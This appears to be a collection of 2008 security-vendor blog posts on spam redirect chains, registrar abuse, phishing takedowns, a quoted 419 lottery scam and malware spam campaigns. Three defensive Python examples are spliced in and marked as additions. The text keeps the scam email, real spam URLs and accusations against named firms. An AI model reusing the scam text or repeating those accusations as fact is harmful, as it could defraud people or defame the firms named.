This is not a new trick. Forward-thinking anti-spammers have been applying reputation to this type of behaviour for quite a while, coupled with generic redirector detection (this mail scored three times our usual deletion threshold). The problem is that some of these links stay alive for days, because it takes a long time and a lot of effort for the redirect sites to clean up working redirectors. Spammers don't retry tricks like this without reason, however.
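The trace above is exactly what a spam-trap crawler has to reproduce: HTTP 3xx Location headers, the Refresh: header that stops plain LWP, and meta-refresh tags, with a hop limit and loop detection so a chain cannot run the crawler in circles. The following crawler is an added example, not the original post's code. It replays the statuses and targets from the trace through a fake fetch function (response bodies are constructed), so it runs offline; swap replay_fetch for a real HTTP client to use it live.

```python
"""Follow a redirect chain hop by hop (added example, not from the original post)."""
from __future__ import annotations

import re
from typing import Callable
from urllib.parse import urljoin, urlparse

Response = tuple[int, dict[str, str], str]  # status, lower-cased headers, body

REFRESH_HEADER = re.compile(r"""^\s*\d+\s*;\s*url\s*=\s*['"]?([^'"\s]+)""", re.I)
META_REFRESH = re.compile(
    r"""<meta[^>]+http-equiv\s*=\s*["']?refresh["']?[^>]*content\s*=\s*["']\s*\d+\s*;\s*url\s*=\s*([^"'>\s]+)""",
    re.I,
)


def _absolute(base: str, target: str) -> str:
    return target if urlparse(target).scheme else urljoin(base, target)


def next_hop(url: str, resp: Response) -> str | None:
    """Where this response sends the browser next, or None if it is the final page."""
    status, headers, body = resp
    if 300 <= status < 400 and "location" in headers:
        return _absolute(url, headers["location"])
    if "refresh" in headers:  # the hop that LWP misses
        m = REFRESH_HEADER.match(headers["refresh"])
        if m:
            return _absolute(url, m.group(1))
    if status == 200:
        m = META_REFRESH.search(body)
        if m:
            return _absolute(url, m.group(1))
    return None


def follow_chain(url: str, fetch: Callable[[str], Response], max_hops: int = 10) -> dict:
    """Walk the chain; stop at the final page, on a loop, or at max_hops."""
    chain = [url]
    status = None
    for _ in range(max_hops):
        resp = fetch(chain[-1])
        status = resp[0]
        nxt = next_hop(chain[-1], resp)
        if nxt is None:
            return {"chain": chain, "final_status": status, "stopped": "end"}
        if nxt in chain:
            return {"chain": chain + [nxt], "final_status": status, "stopped": "loop"}
        chain.append(nxt)
    return {"chain": chain, "final_status": status, "stopped": "max_hops"}


def hosts_in(chain: list[str]) -> list[str]:
    """Distinct hostnames in order of appearance; all but the last are redirectors to report."""
    seen: list[str] = []
    for u in chain:
        h = urlparse(u).hostname or ""
        if h not in seen:
            seen.append(h)
    return seen


# Replay of the trace in the post: statuses and targets as listed there, bodies constructed.
START = "http://demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h"
TRACE: dict[str, Response] = {
    START: (301, {"location": "http://www.demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h"}, ""),
    "http://www.demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h": (200, {"refresh": "0;url=http://tinyurl.com/4nr46h"}, ""),
    "http://tinyurl.com/4nr46h": (301, {"location": "http://blog.com/redirect/?url=http://maltytotrough.com?6ccbe5z5p"}, ""),
    "http://blog.com/redirect/?url=http://maltytotrough.com?6ccbe5z5p": (302, {"location": "http://maltytotrough.com?6ccbe5z5p"}, ""),
    "http://maltytotrough.com?6ccbe5z5p": (302, {"location": "http://www.spinpalace.com/index.asp?a=634991"}, ""),
    "http://www.spinpalace.com/index.asp?a=634991": (301, {"location": "http://www.spinpalace.com/"}, ""),
    "http://www.spinpalace.com/": (200, {}, "<html><body>landing page</body></html>"),
}


def replay_fetch(url: str) -> Response:
    """Offline stand-in for an HTTP client; unknown URLs come back as 404."""
    return TRACE.get(url, (404, {}, ""))


if __name__ == "__main__":
    result = follow_chain(START, replay_fetch)
    for i, u in enumerate(result["chain"]):
        print(f"{i}: {u}")
    print(result["stopped"], hosts_in(result["chain"]))
```

Every hostname hosts_in() returns before the last one is a redirector that the spammer is borrowing, and that is the list to send to the respective abuse desks.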

If any readers are going to be at MAAWG next week, be sure to say “Hi”!
(Slacker Ed. is going too!)

The dark side's domains

Inspired by Igor's post (and whilst Terry is dancing in doorways) I've taken some time out from my current project and beaten a path through the tangled web of service providers, registrars, resellers and registrants of the domain name system that supports the darker side of the web.

This investigation originally started when Garth from Knujon pointed out that Directi have some shill registrars on their books (whilst I was enjoying the Kaiser Chiefs at Rock en Seine in Paris, no less). I then read Brian Krebs' post about Atrivo being one of the best-known dangerous networks around; he finished with a teaser note about ESTDomains. So, guessing what is coming next, I am going to skip the inter-networking gymnastics that bind EST with Atrivo/Intercage/(cernel|inhoster)/etc., privacy services and others, start at the far end of the story, and expose a secret about a not-so-little Indian company called Directi: the almost invisible but vital service that powers the domain registration core of the largest group(s) of bad actors on the web today.

Let me provide some bullet points about the Directi Group of companies to get you up to speed.

  • Directi are a privately owned Indian company with a reported turnover in excess of $300M USD.
  • Directi own LogicBoxes the maker of a product used to manage the registrar relationship with registries.
  • Directi own the reseller Resellerclub.com, and the registrar Answerable.com amongst others.
  • Directi own skenzo.com a domain typo squatting monetization service.
  • Directi’s Logicboxes are responsible for over 3.5M domains, about 45K resellers across 50+ ICANN accredited registrars.
  • LogicBoxes has no acceptable use policy (AUP) for their service.

That last point is the weak link in the chain. Directi's LogicBoxes provides domain registration automation services under contract but without an AUP, and to organizations that have an unholy tie to organised crime at that.

LogicBoxes is a software product or turnkey ASP solution, but some simple tests (that I'm deliberately withholding for now) prove that it is software combined with a backend service, and that Directi are involved at every stage of the game via its service layer even though on the face of it they appear not to be.

(If you don’t understand the cats-cradle of knotted string that holds the domain name registration system together then blame John Levine as he has admitted it’s all his fault and this slide explains it all, “apparently” ;) ).

So on the the murky world of Registrars also being Resellers and why:
ESTDomains, Dynamic Dolphin, to name but a few are huge Directi resellers, and as ICANN accredited registrars also customers of LogicBoxes too. But as Garths and Brian’s posts show there are also many other “shill” registrars and unanswered questions too. However between them they provide a disproportionate amount of domains that are used for illegal activities and most have a path back to Directi’s logicboxes service. I’d estimate the total to be north of 100,000 domains by now, everything from Social networking spam through illegal pharmaceutical supply to botnet command and control.

There is a metric truckload of publicly available evidence for anyone that still doubts the darkness of their hats take a look at the URIBL listings for the last 5 days for ESTdomains. All the linked domains are sites you do not want to click as they contain spam landing pages, fake anti-mailware, porn with fake codecs amongst other things. Why on earth a legitimate registrar would not monitor uribl’s published information and act on it is completely beyond me.

ICANN don’t help the situation by accrediting registrars without a verifiable legitimate address and well publicized & working contacts. We have procurement and vendor qualification processes that’s a real pain some times excellent IMHO, I’ll ask someone to send them a copy ;)

Our friends at Spamhaus have plenty to say about ESTDomains too on many listings, take a look at their nameserver listings for starters SBL53320 SBL53319. Searching ROKSO will reveal a whole lot more. As for Atrivo, it’s a rats nest of issues; A rats nest that would do well to fall off the internet. For more information on the internet-gymnastics I jumped over take a look at this great pdf from hostexploit.com. Keep in mind though that some of the feeder transit networks may be owned or run by the same gang and just exist for redundancy.

The ESTDomains that I’ve investigated first hand have generally fallen into two camps, one where they are registrar directly and one where PublicDomainRegistry is mentioned in the whois, the latter being the “shill” sorry I mean “white labeled Registrar” for the previously mentioned Directi company “resellerclub dot com“. The fact that PrivacyProtect.org is Directi’s whois privacy service (pasted from here) for resellers just makes matters worse.

Don’t get me wrong, Directi have a clue: register a domain directly with a Directi-owned registrar, break the AUP, and they will act, as any registrar must. I’m specifically talking about the other services they provide to the criminal corners of the web.

It would appear that the ESTDomains portfolio has had its privacy protection revoked, which is definitely a step in the right direction. (Breaking news this evening from El Reg and KnujOn; nice work, guys.) However, these guys move pretty fast, and recently EST moved their privacy needs to their own protectdetails.com domain.

So finally I have to ask those making money by providing the core services, Bhavin Turakhia and Divyank Turakhia of Directi: you clearly know the score, so when will you completely stop supporting the illegal acts of EST, DD and other very obvious darkside entities and kick the bad apples out?

Before anyone from a registry or registrar starts the classic “Smith & Wesson” rant think about this, “Smith and Wesson” don’t sell maps or cars, drive you to the forest, apply your camouflage, help with your ICANN accreditation or load your gun for you ;)

Phishing & Vishing takedown best practices

There has been some debate in anti-phishing circles over what a hosting service provider should do when taking down a phishing site. It boils down to one of three basic actions the victims witness.

  • Redirect the hits to the brand’s legitimate site - This, in my opinion, is a dangerous thing to do on many levels, and any brand requesting this action will feature in a follow-up shortly.
  • Remove the site and throw the 404 error - Just stopping the site working and having the browser present a standard error is the standard check-box reaction and minimal effort.
  • Use the hit as an opportunity for education - This is by far my favored option (even though I’ll play devil’s advocate when it’s discussed). Once a victim has fallen for a phish email, help them to help themselves in the future with some easy-to-understand education.

Education has to be appropriate; I’m not suggesting that “click time” is a good moment to present the user with the Anti-Phishing Phil game, for instance. (Phil is great, though, if you’ve never seen it.) “In your face” education at click time is a topic close to the heart of the APWG, and they will present their advice on the topic very soon.

So back to the raison d’être of this blog: a 10-gallon hat tip to AT&T for this great vishing takedown. [Listen to the mp3]*. They’ve raised the bar with this one and deserve some hearty kudos. I can’t think of a better way of dealing with a vishing number. The continuous unavailable tone has no place here, since it’s easily confused with mis-dialing (Homer mp3). They have replaced the disconnected service with a great education statement, and sound advice too if the caller thinks they were a victim.

* The quality is much better on the phone, I used our conference bridge to record the example.

National Postcode Lottery, Twisted 419 scam

In the United Kingdom the term “Postcode Lottery” refers to situations where public services are available only in certain postal districts, districts that are carved up by government authorities according to the first 4 characters of the post code (our equivalent of the American Zip code*). In densely populated areas it is entirely possible for one end of a street to be lucky in a postcode lottery and the other end to be unlucky.

So, postcode lotteries in the UK are generally bad news, and they always get press attention. For instance, the National Health Service (NHS) local trusts will provide a superior premium drug in one area but not in another, creating what is known as a postcode lottery. Prescription charges are another good example.

The remote money fraudsters are taking a very different view!
According to the bottom-feeders a Postcode Lottery is a competition you can win!

Sample below from my Yahoo account. Notice the rotten spelling and the possible macro-replacement issues; incidentally, we call these PBCAK issues internally (Problem Between Chair And Keyboard) ;)

Subject: National Postcode Lottery

National Postcode Lottery

Attention:-

Winner We bring to your notice the winning letter from Nationale Postcode Lottery {United Kingdom Promotion Company} held on the 8th of May, 2008 through Internet ballot System among 10,000 Microsoft users.Subsequently, your email address attached to ticket number 24.2.6.37.15.45 won contract sum of 800,000.00 Pounds ,winning number 100364,ref number XX/0999/171ESP and BATCH: 1211504/MIU.

We request you to pay serious attention to this notification by contacting the claims department with claim information and procedures of claim.

Mr.Jose Bolton
Tel: +44-871-nnn-0525
Fax: +44-700-nnn-0445
Email:divineagent@sify.com

Congratulations once again from our members of staff and thank you for being part of our promotional program.

Yours Sincerely,
Mrs. Stefian Smith
National Postcode Lottery

—————————————————————–
Find the home of your dreams with eircom net property
Sign up for email alerts now [advert removed]

Hardly a political issue, I’m sure you’ll agree. 419 plain and simple. But we’ve seen that email address a lot recently. Time for a good old fashioned LART’ing!

*The full 7 character UK postal code is very accurate, it refers to the handful of mail a postie can deliver, approximately 10 houses or thereabouts.
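As an added example (not code from the original post), here is the kind of indicator scoring a mail-filter author might apply to a message like the one above. The indicator list, the threshold and the From: address on the sample are my own assumptions; the sample body is the message quoted above, with the phone numbers redacted exactly as in the post.

```python
"""Score an e-mail for advance-fee (419) lottery-scam indicators.

Added example, not part of the original post. The indicators are an
assumption about what a filter author would look for; the sample body is
the message quoted in the post, the From: header is a constructed placeholder.
"""
import re
from email import message_from_string

# Constructed message: body copied from the post, sender address invented.
SAMPLE_419 = """\
From: Mrs. Stefian Smith <promo@example.invalid>
Subject: National Postcode Lottery

National Postcode Lottery

Attention:-

Winner We bring to your notice the winning letter from Nationale Postcode Lottery {United Kingdom Promotion Company} held on the 8th of May, 2008 through Internet ballot System among 10,000 Microsoft users.Subsequently, your email address attached to ticket number 24.2.6.37.15.45 won contract sum of 800,000.00 Pounds ,winning number 100364,ref number XX/0999/171ESP and BATCH: 1211504/MIU.

We request you to pay serious attention to this notification by contacting the claims department with claim information and procedures of claim.

Mr.Jose Bolton
Tel: +44-871-nnn-0525
Fax: +44-700-nnn-0445
Email:divineagent@sify.com

Yours Sincerely,
Mrs. Stefian Smith
National Postcode Lottery
"""

# Constructed benign message for comparison.
SAMPLE_BENIGN = """\
From: alice@example.invalid
Subject: Lunch on Friday?

Shall we meet at noon? The usual place is fine by me.
"""

# Each indicator is one pattern; none is conclusive alone, so we count hits.
INDICATORS = {
    # vocabulary of lottery-style advance-fee mails
    "lottery_language": re.compile(
        r"\b(lottery|ticket number|winning number|batch|ref(?:erence)? number)\b", re.I),
    # a large sum written out with a currency name
    "large_prize": re.compile(
        r"\b\d{1,3}(?:,\d{3})+(?:\.\d\d)?\s*(?:pounds|gbp|euros?|dollars|usd)\b", re.I),
    # the "claims agent" the victim is told to contact
    "claims_department": re.compile(r"\bclaims?\s+(?:department|agent|officer)\b", re.I),
    # UK 0871 (revenue-sharing) and 070 (personal numbering) ranges are a
    # classic 419 contact-number choice
    "uk_premium_or_personal_number": re.compile(r"\+44[-\s]?(?:871|70\d)\b"),
    # "your email address ... won": the address was 'selected' at random
    "email_address_won": re.compile(r"\bemail address\b.{0,80}\bwon\b", re.I | re.S),
}

ADDR_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def reply_address_mismatch(msg):
    """True when the body asks for replies to a domain other than the sender's."""
    from_addr = ADDR_RE.search(msg.get("From", "") or "")
    if not from_addr:
        return False
    from_domain = from_addr.group().split("@")[1].lower()
    body_addrs = ADDR_RE.findall(msg.get_payload())
    return any(a.split("@")[1].lower() != from_domain for a in body_addrs)


def score_419(raw_message):
    """Return the names of all indicators that fire on the message."""
    msg = message_from_string(raw_message)
    text = msg.get_payload()
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if reply_address_mismatch(msg):
        hits.append("reply_address_mismatch")
    return hits


def is_advance_fee_scam(raw_message, threshold=3):
    """Assumed policy: three or more independent indicators is a verdict."""
    return len(score_419(raw_message)) >= threshold


if __name__ == "__main__":
    print(score_419(SAMPLE_419), is_advance_fee_scam(SAMPLE_419))
    print(score_419(SAMPLE_BENIGN), is_advance_fee_scam(SAMPLE_BENIGN))
```

The point of counting independent indicators rather than matching a single phrase is that the “rotten spelling” noted above defeats exact-text signatures, while the structural features (premium-rate contact number, reply address on a different domain from the sender, a currency amount next to lottery vocabulary) survive every rewording.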

S.P.A.M. Experiment Update

Meeting the German participants of the McAfee SPAM Experiment for dinner yesterday turned out to be very interesting and provided some unexpected results. After 14 days living on a Spam-mail diet they are still in good shape. Some are so into it that they even installed SiteAdvisor to find out, in advance, if a site is likely to send you spam when you leave your email address there…

Getting in trouble with the girlfriend for browsing dating web sites while leaving his email address for possible use by spammers was one of the less expected (and less desired) results.

And then this: Collecting spam through surfing porn sites really does not work! All who tried told me they didn’t receive much spam when leaving their email on such sites. That really was a surprise for me. I would have expected a lot of spam, as there seems to be a fairly obvious link between porn and certain drugs and enhancement pills…

Constantly living in a world full of (empty) promises seems to have some effect as well: “It’s nice sitting here with you, but soon I’ll be hanging out with Tom Cruise and Jessica Alba and I will even get money for it” - it’s amazing what some shady people promise you, just to get your email address and other personal data.

There was some amazement when two participants figured out they had received nearly identical advance-fee scams: One in English, the other one in the Polish language.

Well, I’m sure all participants will have a lot of interesting experiences and stories to share at the end of the experiment and I sincerely hope they manage to stop clicking on all those ‘you are the 100,000,000,000 visitor of this webpage’-banners ;)

Oh, and a last note: if there is one movie you should watch this year, make sure it’s Futurama: Bender’s Big Score, where spam and phishing play key roles in the story!!

Is Malware affecting Global Warming?

On the 19th of March 2008 I attended a conference at the Said Business School Oxford University called “ICT Towards low carbon emission”.

Many interesting topics were discussed with regards to the impact that Information Technology has on the consumption of energy and the production of CO2. Particular attention was given to the implementation of large data-centres, including the cooling of cabinets of server machines and the utilisation of the respective hardware (storage, processing etc.) for a given task. Dr. Peter Wagget of IBM Emerging Technology Services was present to discuss new efforts being put into developing ways to make our machines perform in a more “planet friendly” fashion. Juergen Heidegger, the Director of ICT Infrastructure Products at Fujitsu Siemens Computers, presented as well. Martin Chilcott, Founder and CEO of Meltwater Ventures, presented a new approach to social groups on the internet, focusing on “green business innovation” with the soon-to-be-launched “2Degrees” g-business network, open to participants interested in sharing ideas, products and expertise on anything CO2 friendly.

Two of the most interesting presentations were by Liam Newcombe of the British Computer Society Data Centre Specialist Group and by Daniel Curtis, the Evaluation Lead on the Low Carbon ICT project.

Liam discussed the current situation and possible improvements in data-centres through better planning and by maximising server throughput. He discussed some very interesting projects such as the Green Grid, as well as highlighting obvious problems that can no longer be disregarded, such as cooling and the use of air-conditioning systems. Just think: with the energy currently used by just over 100 servers in a poorly designed data-centre you could drive a BMW 750 series approximately 40,000,000 km, the equivalent of 100 times around the earth or 5 times to the moon … with its air conditioning on!!

Example of the peak consumption of energy using 3 different Data centre approaches over the course of 4 years:

Daniel Curtis discussed a project currently run at the Oxford Environmental Change Institute directed at designing hardware that will put PCs that are not being used into a much more energy-efficient state than current power management solutions are capable of. He also mentioned that the average PC consumes approx. 76W under normal load and approx. 114W under full load (for example 100% CPU).

After the conference a thought came to my mind…. Think of a recent outbreak of a well known worm, -STORM-. In only a few days, 1.6 million PCs were reported to be infected, resulting in compromised machines running well above “normal operation” loads and therefore consuming more energy!

Allow me to speculate a little……

The difference between normal load and heavy load is approximately 38 watts. Suppose only 50% of the infected machines were running at “heavy load” due to the nature of the exploit hitting them (for example a PUP running fake AV or loads of advertising pop-ups). This would equate to: 900,000 PCs * 38 watts = 32,400,000 watts wasted on some malicious application. Of course I am not even considering the amount of energy used by all the routers and network equipment across the globe going crazy dealing with the abnormal increase in unwanted traffic.

Without using complex calculations, and just to give an impression of what the potential for this wasted energy could be: with the above 32 megawatts I could end up powering my “small” 3-bedroom house for approximately 8 years without having to pay my current electricity supplier, and during this time watch a whole load of wide-screen TV with a plentiful supply of hot tea.

Efforts to create awareness of the problem of carbon emissions are being made by more and more companies throughout the world, and they are starting to show their value. An interesting example is from Google last week: when summertime kicked in, they dressed their well known white homepage in black for the occasion. This is because monitors are known to use less energy displaying black than white (approximately 15 watts less).

Here is an example of a “copycat” search engine called “BLACKLE”:

So the moral is pretty simple: I am going to keep a good AV solution on my black desktop to keep my files safe and at the same time make the planet a little greener. Clean surfing folks!!!

Find out TODAY which websites will be infected TOMORROW!!

Yes, today is April Fool’s Day and the usual pranks are circulated through the net. Some funny. Some not so funny. And some very intriguing ideas.

Offensivecomputing.net, a site dedicated to malware analysis, suddenly looked like one of the current Nuwar campaigns, complete with file downloads (though benign ones) that may have left many users staring at their screens. I did not link directly to them, because including links here that result in executables being automatically downloaded is not a good idea (plus it’s their main page, likely to be changed back in some hours).

But the really interesting idea came from Google: an engine to search tomorrow’s web, today! Finding out which websites will sport malicious downloads the next day, knowing which websites will fall victim to the ongoing mass hacks (reported on here and most recently by Dancho Danchev) within the next 24 hours……. That would be so priceless!

But then Google took Security Nightmares to a next level with another idea: Sending Email back in time. While that feature would be a Spear Phisher’s dream come true, I am rather happy it’s not real.

‘Targeted Attack’ Mania

One of my roles at McAfee Avert Labs is to take a step back from the day-to-day attacks and look at the bigger picture: to review threat trends and forecast what’s to come. Some threats, such as Web feed attacks and IM, are more easily defined and quantified. Other threats are a little more abstract once you scratch the surface.

In recent years the infamous “targeted attack” has gained much media attention. We often heard about a “segment” of users being hit, such as Myspace or Facebook users. I recall snickering the first time I heard a report stating that “home users” were the most targeted of all. I suppose next we’ll hear that Internet users are the most targeted.

So what does the word targeted in targeted attack really mean? One could argue that anyone hit with an attack that was sent to him or her specifically (as in: the email message containing the virus was sent to your address) was a victim of a targeted attack, but that definition is way too broad, as the vast majority of all attacks would then be considered targeted. I pondered the definition of targeted attacks for a bit, trying to think of a simple yet concrete definition. I landed on the word discrimination. For me the key aspect of any targeted attack is that it must discriminate; otherwise the attack is either random or one of opportunity.

Consider Tom, a man who walks into a grocery store, and stops by the tomatoes. He gets the impulse to pick up a few of the mushy ones and hurls them at shoppers. Was this a targeted attack? I’m sure the headlines would read “XYZ Mart Shoppers Targeted by Tomato Mad Man,” but were they really? Those hit were simply in the wrong place at the wrong time; casualties of a random attack. Tom did not discriminate; he aimed for whoever was in proximity (if he aimed at all). If there happened to be five grandmothers nearby, this would still not have been a grandmother-targeted attack.

To bring this back to computer security, spammers often use massive address lists during campaigns. When spammers want to reach as many addresses as possible, they cast a wide net, sending messages to each address on the list–no discrimination, no targeted attack.

Consider a scenario in which an attacker discovers a flaw in Facebook. He may exploit that flaw to reach as many users as possible. Again, “Facebook users” were not targeted here, as there was no discrimination. The Facebook bug simply provided an opportunity.

Here’s a real-world example of a targeted attack. Select U.S. government contractors were sent email messages that contained exploited PowerPoint documents that install a remote-access Trojan on victims’ systems. Here “select U.S. government contractors” were singled out; not “government contractors,” not “email users,” not “PowerPoint users,” and not “Microsoft” (maker of PowerPoint).

In my Facebook example one could argue that the Facebook company itself was targeted; someone had to discover and exploit a flaw in that scenario to get to the user base. However, in my targeted U.S. government contractors example, few would consider Microsoft the target of that attack. The PowerPoint vulnerability was simply the means to an end, providing an opportunity.

Let’s look at another type of attack.

Some publicized targeted attacks used personal information. Potential victims may receive an email message containing not only their names, but also places of business, and possibly their titles, addresses, or phone numbers. Does that make these attacks targeted? Not necessarily. Yes, these are context-aware or personalized attacks; but without discrimination, these should not be considered targeted.

Other attacks rely on applications typically used by a segment of the population, such as music or video players, or social-networking sites. Does this mean that segment is targeted? Those users may be at a greater risk of being attacked, but that does not make them targeted. Accordingly, malicious fake video codecs and the like do not necessarily target home users!

Why Target?
In an effort to keep this blog from getting too long, here’s a short list of why attackers might keep an attack targeted:

  • To keep a low profile for the malicious code (an effort to evade/delay malcode detection by flying under the radar)
  • To keep a low profile for the entity behind the attack (an effort to evade prosecution)
  • To minimize “casualties of war” (most attackers don’t really care if innocent bystanders get infected, but some small segment likely does).

Asking the questions why and how the XYZ attack was limited can help determine if the attack was indeed targeted.

What’s Really the Target?
Another litmus test when attempting to validate a targeted attack is to ask: What is really the target? If the answer is any and every username and password the attackers can get their hands on, then the attack is probably not targeted. We often hear about a bank being targeted in a massive phishing attack. Although such an attack may have been geared toward users of a single bank, one must ask Why? Imagine, how effective would a single phishing campaign be if a spammed email message listed dozens of banking sites and asked users to click the link for their banks? And if the attacker must limit the phishing messages to a single bank, one could consider this to be a process of elimination, and elimination does not equal discrimination.

I can appreciate the challenge the media face when writing the headline for an attack that affects only a segment of users. It’s just unfortunate that the term targeted is so overused that estimates of the problem can greatly vary.

It’s Time for your update Mr. Brown… Hacking the Human

Straight out of science fiction? Sounds like it, but it may be closer to reality than you would think.

Recently a bunch of researchers from the University of Washington and the University of Massachusetts (plus a Harvard MD and a University of Washington PhD) were able to hack a pacemaker/defibrillator.

Think about this for a moment…they were able to make the device stop.

They released the report on their Web site dedicated to medical device security. Very interesting stuff.

Under the hood (so to speak – it was actually on a table) they found that they were able to connect to the device wirelessly, and cause it to shock on command and even to stop altogether. Almost secondary at this point, they were also able to glean sensitive patient information stored on the device.

Exploit scenarios for this are better left to more deviant-minded individuals, but the net effect is obviously very serious. (When’s the last time your server went post-mortem, literally, from a flaw?)

So here’s the coolest part to the story:

They have examples of how to fix it! How many times have you seen a researcher release details of an exploit and not suggest how to fix it (aye, irresponsible disclosure)? They have taken account of the device designs (wireless transmission) and limitations (battery power) and have suggested ways that device makers could improve the security. Kudos to them! Hopefully this will spark a growing industry to make these devices safer.

One last thought here… would it not be surreal if a computer virus transcended the electronic world and actually infected a human being?

Microsoft OneCare incorrectly tagging SiteAdvisor; Solution in progress

Microsoft’s OneCare team issued an update on January 31, 2008 that resulted in SiteAdvisor users receiving a Microsoft warning message recommending that SiteAdvisor be removed due to interference with OneCare.

OneCare SiteAdvisor warning

SiteAdvisor doesn’t interfere with OneCare in any way; we communicated this to Microsoft and they’ve begun to resolve the issue.

As of February 21st, new installations of OneCare will not message against SiteAdvisor. However, existing users of OneCare will continue to receive these messages until sometime in the spring, when Microsoft says it will fix OneCare installations made prior to February 21.

Turns out that as a general rule, Microsoft recommends running only one security application at a time because of potential performance and “PC stability” issues. We explained to Microsoft that SiteAdvisor functionality is totally unrelated to OneCare. They agreed.

Rest assured, there is no need to disable SiteAdvisor or OneCare. The two products co-exist nicely (aside from the pop-up!).

Because OneCare doesn’t allow white listing of applications, affected consumers have limited options until all installations of OneCare are patched. Thanks for your patience during this time.

Process for 0wning the Challenges in Applied Security’s Hack IT 2.0 at Shmoocon

Last night I shared with the group at AHA! how Ryan and I went through most of the challenges in Applied Security’s HackIT 2.0 contest at ShmooCon 2008. I spoke about how we approached and solved most of the challenges, and I thought I would share the process with whoever else was interested. I posted an informal report describing the methodologies and how to run/use the tools that we employed during the contest. The report is located on AHA!’s wiki, so if you’re interested, it’s here on the meeting page. There is also a link to a PDF report if you want to take it offline. Also, if you are in Austin, Texas (or the surrounding area), you should check out AHA! We get together and present as many short DefCon-style talks as we can before we get kicked out of Mangia Pizza. We share a lot of interesting/fun/useful ideas and information with each other. Plus, if you are a remote worker, it’s a nice opportunity to get out and meet other “hackers” and shoot the breeze. We are a very welcoming bunch, but if you do come, be prepared to present. :)

Super Wednesday

Whilst the masses stay vigilant to “love” attacks [1][2][3][4] in the run-up to Valentine’s Day (tomorrow, don’t forget!), others, including McAfee Avert Labs, are wary of further hybrid spam and malware attacks. This morning we received thousands upon thousands of “Google Ad link” samples via our anti-malware and anti-spam automation systems.

A topical social-engineering trick highlights the race to the White House [5] for the Hillary Clintons and Barack Obamas of the world. It’s actually surprising we didn’t see more of this attack yesterday, the one-week anniversary of Super Tuesday [6].

The spam email (example below) contains a link (hidden by HTML [7]) that points to Google’s page-ad service, passing it another URL, a malicious one, so that the ad service effectively redirects your browser to a site hosting a Downloader.gen.a [8] sample, which we detect proactively. The site used in this attack is suspected to be linked to the notorious Russian Business Network (RBN) [9].
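Added example, not code from the original post: a checker that pulls the links out of an HTML mail and reports the two things the paragraph above describes, a visible link text that names one host while the href goes to another, and a query parameter that carries a second, absolute URL (the real destination behind a click-redirector). The sample mail, the ad-service hostname ads.example-adservice.invalid and the parameter name adurl are all constructed placeholders, not a claim about any real service’s URL format.

```python
"""Flag e-mail links whose visible text hides where they really go.

Added example; the HTML below is constructed. The redirector hostname and
the 'adurl' parameter are placeholders for the page-ad redirect described
in the post, not a real service's URL layout.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed sample of the hybrid spam: the link text looks like a video
# site, the href goes to a redirector whose query string carries the real URL.
SAMPLE_SPAM_HTML = """\
<html><body>
<p>Hillary Clinton Full Video !!!</p>
<p><a href="http://ads.example-adservice.invalid/click?adurl=http%3A%2F%2Fvideo-host.example.invalid%2Fvideo.html">http://www.youtube.com/watch?v=abc123</a></p>
<p><a href="http://www.example.com/unsubscribe">Unsubscribe</a></p>
</body></html>
"""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def embedded_destination(href):
    """Return an absolute URL carried in any query parameter, else None.

    For a click-redirector that is where the browser ends up, whatever the
    host in the href itself says."""
    for values in parse_qs(urlsplit(href).query).values():
        for value in values:
            if value.lower().startswith(("http://", "https://")):
                return value
    return None


def _shown_host(text):
    """Host a reader would infer from link text that looks like a URL."""
    if text.lower().startswith(("http://", "https://")):
        return urlsplit(text).hostname
    if text.lower().startswith("www."):
        return urlsplit("http://" + text).hostname
    return None


def suspicious_links(html):
    """Return [(href, [reason, ...])] for links that misrepresent their target."""
    collector = LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        reasons = []
        dest = embedded_destination(href)
        if dest:
            reasons.append(f"redirects via query parameter to {dest}")
        shown = _shown_host(text)
        if shown and shown != urlsplit(href).hostname:
            reasons.append(
                f"visible text shows {shown} but link goes to {urlsplit(href).hostname}")
        if reasons:
            findings.append((href, reasons))
    return findings


if __name__ == "__main__":
    for href, reasons in suspicious_links(SAMPLE_SPAM_HTML):
        print(href)
        for reason in reasons:
            print("   -", reason)
```

Neither check needs a reputation lookup: both are structural and work on the mail body alone, which is why a gateway can apply them to a campaign of this size before any of the landing sites are blacklisted.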

Other examples of this spam included some of the following subjects:

  • Hillary Clinton Full Video !!!
  • Interesting dvd with Beyonce + 4 asiatic lovers!
  • Interesting dvd with Jennifer Lopez + 5 english boys!
  • Interesting mp3 with Beyonce + 5 portuguese horse!
  • Interesting photo with Mylene Farmer + 6 black stallions!
  • Interesting video with Keira Knightley + 2 black dogs!
  • Keen melody with Christina Aguilera + 4 english boys!
  • Keen photo with Britney Spears + 4 asiatic stallions!
  • Kick-up mp3 with Christina Aguilera + 5 irish mans!
  • New melody with Kylie Minogue + 3 spain dogs!
  • New presentation with Mylene Farmer + 6 portuguese lesbians!
  • Part of presentation with Jessica Parker + 6 black dogs!
  • Shocking photo with Jessica Parker + 3 italian horse!
  • Stunning presentation with Beyonce + 3 black stallions!

We urge you to be vigilant and keep your anti-spam and anti-malware protection up to date. Remember, if it sounds too good to be true, it normally is. ;)

[1] : http://www.publicopiniononline.com/localnews/ci_8249998
[2] : http://blogs.knoxnews.com/knx/silence/archives/2008/02/valentines_day.shtml
[3] : http://www.nbc13.com/gulfcoastwest/vtm/news.apx.-content-articles-VTM-2008-02-13-0006.html
[4] : http://press-releases.techwhack.com/16498/microworld-technologies
[5] : http://www.independent.co.uk/news/in-the-news/race-for-whitehouse
[6] : http://en.wikipedia.org/wiki/Super_Tuesday
[7] : http://www.avertlabs.com/research/blog/index.php/2007/08/20/the-risks-of-html-formatted-e-mails
[8] : http://vil.nai.com/vil/content/v_142821.htm
[9] : http://www.securecomputing.net.au/news/69637,britney-paris-used-as-hook-in-new-spam-botnet.aspx

McAfee Avert Labs Gains a Director

